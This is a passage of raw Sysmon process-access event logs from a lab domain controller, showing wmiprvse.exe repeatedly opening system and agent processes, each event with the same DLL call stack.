Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.974{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 